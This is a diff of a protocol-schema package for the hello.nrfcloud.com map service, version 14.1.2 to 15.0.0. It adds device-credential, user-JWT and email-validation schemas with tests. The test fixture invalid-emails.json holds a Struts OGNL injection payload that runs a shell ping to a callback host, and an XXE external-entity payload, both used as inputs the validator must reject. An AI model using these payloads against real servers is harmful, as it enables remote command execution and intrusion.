@hello.nrfcloud.com/proto-map 14.1.2 → 15.0.0

package/api/Context.ts

@@ -2,8 +2,10 @@ const baseURL = `https://github.com/hello-nrfcloud/proto-map`
 
 export const Context = {
 	device: new URL(`${baseURL}/device`),
+	deviceCredentials: new URL(`${baseURL}/device/credentials`),
 	devices: new URL(`${baseURL}/devices`),
 	deviceJWT: new URL(`${baseURL}/device-jwt`),
+	userJWT: new URL(`${baseURL}/user-jwt`),
 	shareDevice: {
 		request: new URL(`${baseURL}/share-device-request`),
 		ownershipConfirmed: new URL(`${baseURL}/share-device-ownership-confirmed`),

package/api/DeviceCredentials.ts

@@ -0,0 +1,27 @@
+import { Type } from '@sinclair/typebox'
+import { Context } from './Context.js'
+import { DeviceId, PublicDeviceId } from './DeviceId.js'
+
+export const DeviceCredentials = Type.Object(
+	{
+		'@context': Type.Literal(Context.deviceCredentials.toString()),
+		id: PublicDeviceId,
+		deviceId: DeviceId,
+		credentials: Type.Object({
+			privateKey: Type.String({
+				minLength: 1,
+				title: 'Private Key',
+				description: 'PEM encoded private key',
+			}),
+			certificate: Type.String({
+				minLength: 1,
+				title: 'Certificate',
+				description: 'PEM encoded certificate',
+			}),
+		}),
+	},
+	{
+		title: 'Device credentials',
+		description: 'contains credentials for custom devices',
+	},
+)

package/api/DeviceJWT.ts

@@ -5,6 +5,7 @@ import { Context } from './Context.js'
 
 export const DeviceJWTPayload = Type.Object(
 	{
+		'@context': Type.Literal(Context.deviceJWT.toString()),
 		id: PublicDeviceId,
 		deviceId: DeviceId,
 		model: Model,

package/api/Email.spec.ts

@@ -0,0 +1,29 @@
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+import invalidEmails from './test/invalid-emails.json' assert { type: 'json' }
+import { Email } from './Email.js'
+import { validate } from '../validate.js'
+
+const v = validate(Email)
+
+void describe('it should validate emails', () => {
+	for (const validEmail of ['alex@example.com', 'a@a.no']) {
+		void it(`should validate ${validEmail}`, () => {
+			assert.equal(
+				'errors' in v(validEmail),
+				false,
+				`${validEmail} should be valid`,
+			)
+		})
+	}
+
+	for (const email of invalidEmails) {
+		void it(`should not validate ${email}`, () => {
+			assert.equal(
+				'errors' in v(email),
+				true,
+				`The email ${email} should not be valid!`,
+			)
+		})
+	}
+})

package/api/Email.ts

@@ -0,0 +1,12 @@
+import { Type } from '@sinclair/typebox'
+
+const disallowedChars = '@;" '
+const rx = new RegExp(
+	`^[^${disallowedChars}]{1,256}@[^${disallowedChars}]{3,253}$`,
+	'i',
+)
+export const Email = Type.RegExp(rx, {
+	title: 'Email',
+	description:
+		'The email of the owner of the device. They have to confirm the publication of the device every 30 days.',
+})

package/api/UserJWT.ts

@@ -0,0 +1,35 @@
+import { Type } from '@sinclair/typebox'
+import { Context } from './Context.js'
+import { Email } from './Email.js'
+
+export const UserJWTPayload = Type.Object(
+	{
+		'@context': Type.Literal(Context.userJWT.toString()),
+		email: Email,
+	},
+	{
+		title: 'UserJWTPayload',
+		description: 'The payload of the JWT for a user identified by their email.',
+	},
+)
+
+export const UserJWT = Type.Intersect([
+	Type.Object(
+		{
+			'@context': Type.Literal(Context.userJWT.toString()),
+			jwt: Type.String({
+				title: 'JWT',
+				minLength: 5,
+				description: 'The JWT for a user.',
+				examples: [
+					'eyJhbGciOiJFUzUxMiIsInR5cCI6IkpXVCIsImtpZCI6ImEyMGM0NzZkLTVlZjUtNDE1NS1iODllLTdkZWRiMzJjODVhNCJ9.eyJpZCI6ImQ0OThkNzZhLWQ0ZjktNGQ4YS1iMTYwLTNlODA5NGMzOGNmYSIsImRldmljZUlkIjoidGFsbXVkaWMtb3ZlcnJhdGUtcGVuc2l2ZWQiLCJtb2RlbCI6InRoaW5neTkxeCIsImlhdCI6MTcyMTI4NjA1NywiZXhwIjoxNzIxMjg5NjU3LCJhdWQiOiJoZWxsby5ucmZjbG91ZC5jb20ifQ.Afn2Vj7V4boatn3Dwf4yZCTh09lTpfAEfsaX2uTZv0z2EvcWVH3CeVVsEmvCtDb8mnpvxJcj88-l9PlJqShKzZF5AShz6Ps0Igkzm0PueGjK-nq12I8DTgraT6fdSB3v5ALzLC9ozwyuPN7kJDLMHMHkO3j24sveBvFLg2BLsharSRBN',
+				],
+			}),
+		},
+		{
+			title: 'UserJWT',
+			description: 'The JWT for a user.',
+		},
+	),
+	UserJWTPayload,
+])

package/api/index.ts

@@ -5,4 +5,6 @@ export * from './ShareDeviceOwnershipConfirmed.js'
 export * from './ShareDeviceRequest.js'
 export * from './LwM2M.js'
 export * from './DeviceJWT.js'
+export * from './UserJWT.js'
 export * from './APIHealth.js'
+export * from './DeviceCredentials.js'

package/api/test/invalid-emails.json

@@ -0,0 +1,7 @@
+[
+  "%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping j9tbwbatz7e2rvipj6r59wf4yv4lsa.example.com -c1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}",
+  "<!DOCTYPE foo [<!ENTITY xxeww2qq SYSTEM \"http://foo.example.com\"> ]>alex@example.com;alex@example.eu<root>&xxeww2qq;</root>",
+  "alex@example.com;alex@example.eu",
+  "{\"@type\":\"Freddy\"}",
+  "{\"@class\":\"\"}"
+]

package/dist/api/Context.js

@@ -1,8 +1,10 @@
 var baseURL = "https://github.com/hello-nrfcloud/proto-map";
 export var Context = {
     device: new URL("".concat(baseURL, "/device")),
+    deviceCredentials: new URL("".concat(baseURL, "/device/credentials")),
     devices: new URL("".concat(baseURL, "/devices")),
     deviceJWT: new URL("".concat(baseURL, "/device-jwt")),
+    userJWT: new URL("".concat(baseURL, "/user-jwt")),
     shareDevice: {
         request: new URL("".concat(baseURL, "/share-device-request")),
         ownershipConfirmed: new URL("".concat(baseURL, "/share-device-ownership-confirmed"))

package/dist/api/DeviceCredentials.js

@@ -0,0 +1,23 @@
+import { Type } from '@sinclair/typebox';
+import { Context } from './Context.js';
+import { DeviceId, PublicDeviceId } from './DeviceId.js';
+export var DeviceCredentials = Type.Object({
+    '@context': Type.Literal(Context.deviceCredentials.toString()),
+    id: PublicDeviceId,
+    deviceId: DeviceId,
+    credentials: Type.Object({
+        privateKey: Type.String({
+            minLength: 1,
+            title: 'Private Key',
+            description: 'PEM encoded private key'
+        }),
+        certificate: Type.String({
+            minLength: 1,
+            title: 'Certificate',
+            description: 'PEM encoded certificate'
+        })
+    })
+}, {
+    title: 'Device credentials',
+    description: 'contains credentials for custom devices'
+});

package/dist/api/DeviceJWT.js

@@ -3,6 +3,7 @@ import { DeviceId, PublicDeviceId } from './DeviceId.js';
 import { Model } from './Devices.js';
 import { Context } from './Context.js';
 export var DeviceJWTPayload = Type.Object({
+    '@context': Type.Literal(Context.deviceJWT.toString()),
     id: PublicDeviceId,
     deviceId: DeviceId,
     model: Model

package/dist/api/Email.js

@@ -0,0 +1,7 @@
+import { Type } from '@sinclair/typebox';
+var disallowedChars = '@;" ';
+var rx = new RegExp("^[^".concat(disallowedChars, "]{1,256}@[^").concat(disallowedChars, "]{3,253}$"), 'i');
+export var Email = Type.RegExp(rx, {
+    title: 'Email',
+    description: 'The email of the owner of the device. They have to confirm the publication of the device every 30 days.'
+});

package/dist/api/Email.spec.js

@@ -0,0 +1,43 @@
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import invalidEmails from './test/invalid-emails.json' assert {
+    type: 'json'
+};
+import { Email } from './Email.js';
+import { validate } from '../validate.js';
+var v = validate(Email);
+void describe('it should validate emails', function() {
+    var _loop = function(_i, _iter) {
+        var validEmail = _iter[_i];
+        void it("should validate ".concat(validEmail), function() {
+            assert.equal('errors' in v(validEmail), false, "".concat(validEmail, " should be valid"));
+        });
+    };
+    for(var _i = 0, _iter = [
+        'alex@example.com',
+        'a@a.no'
+    ]; _i < _iter.length; _i++)_loop(_i, _iter);
+    var _iteratorNormalCompletion = true, _didIteratorError = false, _iteratorError = undefined;
+    try {
+        var _loop1 = function() {
+            var email = _step.value;
+            void it("should not validate ".concat(email), function() {
+                assert.equal('errors' in v(email), true, "The email ".concat(email, " should not be valid!"));
+            });
+        };
+        for(var _iterator = invalidEmails[Symbol.iterator](), _step; !(_iteratorNormalCompletion = (_step = _iterator.next()).done); _iteratorNormalCompletion = true)_loop1();
+    } catch (err) {
+        _didIteratorError = true;
+        _iteratorError = err;
+    } finally{
+        try {
+            if (!_iteratorNormalCompletion && _iterator.return != null) {
+                _iterator.return();
+            }
+        } finally{
+            if (_didIteratorError) {
+                throw _iteratorError;
+            }
+        }
+    }
+});

package/dist/api/UserJWT.js

@@ -0,0 +1,27 @@
+import { Type } from '@sinclair/typebox';
+import { Context } from './Context.js';
+import { Email } from './Email.js';
+export var UserJWTPayload = Type.Object({
+    '@context': Type.Literal(Context.userJWT.toString()),
+    email: Email
+}, {
+    title: 'UserJWTPayload',
+    description: 'The payload of the JWT for a user identified by their email.'
+});
+export var UserJWT = Type.Intersect([
+    Type.Object({
+        '@context': Type.Literal(Context.userJWT.toString()),
+        jwt: Type.String({
+            title: 'JWT',
+            minLength: 5,
+            description: 'The JWT for a user.',
+            examples: [
+                'eyJhbGciOiJFUzUxMiIsInR5cCI6IkpXVCIsImtpZCI6ImEyMGM0NzZkLTVlZjUtNDE1NS1iODllLTdkZWRiMzJjODVhNCJ9.eyJpZCI6ImQ0OThkNzZhLWQ0ZjktNGQ4YS1iMTYwLTNlODA5NGMzOGNmYSIsImRldmljZUlkIjoidGFsbXVkaWMtb3ZlcnJhdGUtcGVuc2l2ZWQiLCJtb2RlbCI6InRoaW5neTkxeCIsImlhdCI6MTcyMTI4NjA1NywiZXhwIjoxNzIxMjg5NjU3LCJhdWQiOiJoZWxsby5ucmZjbG91ZC5jb20ifQ.Afn2Vj7V4boatn3Dwf4yZCTh09lTpfAEfsaX2uTZv0z2EvcWVH3CeVVsEmvCtDb8mnpvxJcj88-l9PlJqShKzZF5AShz6Ps0Igkzm0PueGjK-nq12I8DTgraT6fdSB3v5ALzLC9ozwyuPN7kJDLMHMHkO3j24sveBvFLg2BLsharSRBN'
+            ]
+        })
+    }, {
+        title: 'UserJWT',
+        description: 'The JWT for a user.'
+    }),
+    UserJWTPayload
+]);

package/dist/api/index.js

@@ -5,4 +5,6 @@ export * from './ShareDeviceOwnershipConfirmed.js';
 export * from './ShareDeviceRequest.js';
 export * from './LwM2M.js';
 export * from './DeviceJWT.js';
+export * from './UserJWT.js';
 export * from './APIHealth.js';
+export * from './DeviceCredentials.js';

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@hello.nrfcloud.com/proto-map",
-  "version": "14.1.2",
+  "version": "15.0.0",
   "description": "Documents the communication protocol between devices, the hello.nrfcloud.com/map backend and web application",
   "type": "module",
   "exports": {
@@ -39,18 +39,18 @@
     "@bifravst/prettier-config": "1.0.4",
     "@commitlint/config-conventional": "19.2.2",
     "@swc/cli": "0.4.0",
-    "@swc/core": "1.7.3",
-    "@types/node": "20.14.13",
+    "@swc/core": "1.7.6",
+    "@types/node": "22.1.0",
     "@types/xml2js": "0.4.14",
     "chalk": "5.3.0",
     "globstar": "1.0.0",
     "husky": "9.1.4",
-    "lint-staged": "15.2.7",
+    "lint-staged": "15.2.8",
     "prettier-plugin-organize-imports": "4.0.0",
     "remark": "15.0.1",
     "remark-frontmatter": "5.0.0",
     "tsmatchers": "5.0.2",
-    "tsx": "4.16.2",
+    "tsx": "4.16.5",
     "typescript": "5.5.4",
     "xml2js": "0.6.2",
     "yaml": "2.5.0"